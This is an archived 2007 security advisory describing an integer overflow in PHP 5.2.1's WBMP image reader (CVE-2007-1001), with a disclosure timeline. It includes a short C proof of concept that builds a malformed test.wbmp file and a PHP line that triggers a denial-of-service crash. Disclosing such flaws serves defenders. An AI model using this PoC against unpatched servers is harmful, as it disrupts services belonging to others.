php521-overflow.txt

php521-overflow.txt: Posted Apr 10, 2007; Authored by Ivan Fratric; There is an integer overflow in PHP versions 5.2.1 and below in ext/gd/libgd/wbmp.c in the function readwbmp.; tags | advisory, overflow, php; SHA-256 | aa74b34ae08f9f37b439284153a51e2cc96cf731a3e5258a9d508e00d2e5d7c6; Download | Favorite | View

php521-overflow.txt

There is an integer overflow in PHP in ext/gd/libgd/wbmp.c in the
function readwbmp. If large enough values are specified for wbmp image
height and/or width, so that width*height > 2^32, an integer overflow
occurs on the following line

if ((wbmp->bitmap = (int *) safe_emalloc(wbmp->width * wbmp->height,
sizeof(int), 0)) == NULL)

causing the amount of memory allocated to be smaller than the amount
of data to be read, subsequently causing buffer overflow (See the DoS
PoC below).

Upon discovery, I first thought this to be a LibGD issue, however the
file wbmp.c is changed in LibGD (as early as in version 2.0.33
released in 2004) and does not have this overflow.

As the only values written in memory upon exploiting this can be
(int)0 and (int)1, exploiting this for anything other then DoS seems
highly unlikely.

Timeline

Feb 14 2007 - Vulnerability discovered
Mar 7 2007 - Vendor contacted
Mar 7 2007 - Vendor responded, confirmed the bug and said they plan to
fix it in PHP 5.2.2, which is to be released in April
Apr 7 2007 - Release of this advisory

Note: I was going to wait until the release of PHP 5.2.2 before
publishing this, but seeing FrSIRT (and possibly others) already
pubished it I am pushing the release forward a bit.

References

http://www.php.net/
http://ifsec.blogspot.com/2007/04/php-521-wbmp-file-handling-integer.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1001
http://www.frsirt.com/english/advisories/2007/1269

PoC

#define BUFSIZE 1000000

#include <stdio.h>

int main()
{
       int c;
       char buf[BUFSIZE];

       FILE *fp = fopen("test.wbmp","w");

       //write header
       c = 0;
       fputc(c,fp);
       fputc(c,fp);

       //write width = 2^32 / 4 + 1
       c = 0x84;
       fputc(c,fp);
       c = 0x80;
       fputc(c,fp);
       fputc(c,fp);
       fputc(c,fp);
       c = 0x01;
       fputc(c,fp);

       //write height = 4
       c = 0x04;
       fputc(c,fp);

       //write some data to cause overflow
       fwrite(buf,sizeof(buf),1,fp);

       fclose(fp);
}


<?php
$image = imagecreatefromwbmp('test.wbmp'); //overflow occurs
?>

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

php521-overflow.txt

php521-overflow.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

php521-overflow.txt

Share This

php521-overflow.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems